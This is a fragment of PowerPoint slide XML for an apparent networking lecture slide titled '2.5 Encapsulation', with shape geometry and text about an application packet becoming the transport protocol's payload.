              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC31414-6397-D132-1662-9B6242ED6F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823D4216-12EA-930F-87E4-8B2042671E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFB64B3-8FDD-884D-3162-5E437D28CCB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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4" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751A5E32-F674-39D2-6532-9ADBE73FFF5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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7" name="object 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FE6454-2538-1ECA-1364-8AFFE2E758B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0409F47-CF09-EA1B-A983-6BEC54888DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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29" name="object 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52435456-1CD3-A5CF-BC21-C81F6C60577D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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43</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57938E3-E525-1BFD-FC61-7C7C2B2B1F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E980D63-2435-2237-3B83-CA9BDEBD63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489F4197-09D0-2DDC-277B-C2D17CDFF9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456659" y="3164511"/>
            <a:ext cx="30702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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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packet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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is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now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transport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protocol's</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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payload.</a:t>
            </a:r>
            <a:endParaRPr sz="240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883E10-0F2C-76F0-CF25-413971B617FF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="623880" y="1362240"/>
              <a:ext cx="7458480" cy="143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883E10-0F2C-76F0-CF25-413971B617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520" y="1352880"/>
                <a:ext cx="7477200" cy="14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0906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FEC7962-7D6D-1B68-81EC-3ED77D8FB374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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5BB5DB82-BED9-798C-F2EF-04513E0A011B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A15E27F-DC62-2FDE-CE26-5697A5468270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C0FE75FE-77C0-1E3B-7486-3CE5C8CEE1FF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55D9964D-00C9-6CB0-55F1-FE35897CE96A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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38EDA6A3-AB26-0BF9-E5E0-6A2C8B91B986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DA868A-EEDE-4806-57FC-A50CA2E2F1AE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00763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2" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E54C8F5-993E-BDF0-A075-75039BF4E002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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC6336F-70B8-DDFC-36BC-FFF55E1646EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D859DB-AFE8-5301-7CFE-E9116380E513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6AF550-8E61-F11C-C4F5-FDA8827C41DA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0" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A90073-6EE2-BD94-C013-46789FDF01F2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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D36591-F982-7A79-4076-959A37881CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C096B5B-6226-3E01-4C71-B3F6F4BD0DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DAF56BF-0E0B-C04E-4219-FF07E1669034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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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8" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A55425-B111-65B6-41BB-F62E0FBEF74C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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{923BF006-650A-CD04-B126-73DF5162F18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305AFB19-D988-7D47-45E2-5E2AB4221C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD55C5A-DE85-E22A-5665-5C657FED7217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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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6" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF03CCD4-EA3C-A165-0FFA-622D7E37D942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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C91143-9E62-72AE-F7C9-702DFAD6006F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92216620-B194-FC44-4382-3846859C37A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B797040A-982D-C107-9906-563DC938D76A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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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4" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180B38C8-4F5A-D47C-B785-A354B2A47153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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F60C98-88C4-FE25-5312-F58B749719B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5876EE0-060F-EDD2-5999-CC2DC0571E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124F975A-1AB9-0106-F29B-DA22ECCD9289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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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2" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8C94A8A-EB5E-D7E7-281A-E9524D3F0B68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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E972C76-1806-D479-DBCD-493C1A7C947B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13811C1E-FD1F-51DF-7BC0-175F6F2DCBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296508" y="2087679"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275070" y="2157222"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE8F80E-DB50-3C3B-2655-929FD4644AD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F6C3CD-8889-7CFF-388A-6FA635A85B2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E7DE0E-17BD-DF0C-B14E-9492BCD3DA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68978DE-A273-CB6F-C593-2FFC24BBD955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824323" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
